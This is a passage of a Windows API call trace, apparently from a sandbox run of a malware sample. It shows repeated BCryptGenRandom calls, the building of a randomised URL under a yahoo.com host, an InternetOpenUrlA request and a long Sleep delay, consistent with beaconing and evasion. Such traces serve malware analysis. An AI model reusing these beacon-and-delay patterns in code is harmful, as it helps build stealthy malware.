lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.606] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0172.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16a16, cbBuffer=0x2d, dwFlags=0x2 | out: pbBuffer=0x3a16a16) returned 0x0 [0172.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.607] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.608] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.608] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.608] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.608] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.608] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.608] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.609] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.609] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.609] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.609] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.609] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.609] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.609] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.610] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.610] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.610] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.610] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.610] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.610] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.611] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.611] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0172.611] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.611] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.611] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.611] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.611] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.612] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0172.612] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.612] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.612] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.612] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.612] GetProcessHeap () returned 0x440000 [0172.612] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473770 [0172.612] lstrcpyA (in: lpString1=0x473770, lpString2="Aîu…s://www.yahoo.com" | out: lpString1="Aîu…s://www.yahoo.com") returned="Aîu…s://www.yahoo.com" [0172.613] lstrcatA (in: lpString1="Aîu…s://www.yahoo.com", lpString2="/turpqhq8om18vexxlsjld6mcxcjilakfw/u1Fy21KwD84vohmerP/xpEnvwlqc2hBJdrpqUZfbql1imvFkb9DdemcS2sRxom4/" | out: lpString1="Aîu…s://www.yahoo.com/turpqhq8om18vexxlsjld6mcxcjilakfw/u1Fy21KwD84vohmerP/xpEnvwlqc2hBJdrpqUZfbql1imvFkb9DdemcS2sRxom4/") returned="Aîu…s://www.yahoo.com/turpqhq8om18vexxlsjld6mcxcjilakfw/u1Fy21KwD84vohmerP/xpEnvwlqc2hBJdrpqUZfbql1imvFkb9DdemcS2sRxom4/" [0172.613] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0172.613] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="Aîu…s://www.yahoo.com/turpqhq8om18vexxlsjld6mcxcjilakfw/u1Fy21KwD84vohmerP/xpEnvwlqc2hBJdrpqUZfbql1imvFkb9DdemcS2sRxom4/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0172.613] GetProcessHeap () returned 0x440000 [0172.613] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473770 | out: hHeap=0x440000) returned 1 [0172.613] GetProcessHeap () returned 0x440000 [0172.613] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a169e0 | out: hHeap=0x440000) returned 1 [0172.613] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0172.613] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0172.613] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.613] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0172.614] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0172.614] Sleep (dwMilliseconds=0x1179e) [0172.808] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.808] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0172.809] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.809] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0172.809] GetProcessHeap () returned 0x440000 [0172.809] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a17840 [0172.809] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.809] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0172.809] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.809] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17841, cbBuffer=0x1b, dwFlags=0x2 | out: pbBuffer=0x3a17841) returned 0x0 [0172.809] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.809] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.810] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.810] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.810] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.810] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.810] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.810] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.810] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.810] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0172.810] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.810] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.810] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.810] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.811] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.811] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.811] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.811] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0172.811] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.811] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.811] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.811] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.811] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.812] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.812] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.812] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.812] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.812] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.812] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.812] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.812] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.812] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0172.812] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.812] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.813] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.813] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.813] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.813] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0172.813] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.813] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1785c, cbBuffer=0x2c, dwFlags=0x2 | out: pbBuffer=0x3a1785c) returned 0x0 [0172.813] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.813] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.813] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.813] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.814] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.814] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.814] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.814] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.814] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.814] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0172.814] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.814] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.814] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.814] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.814] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.815] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.815] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.815] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.815] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.815] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.815] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.815] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0172.815] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.815] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.815] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.815] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.816] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.816] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0172.816] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.816] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.816] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.816] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.817] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.817] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.817] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.817] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.817] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0172.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0172.817] 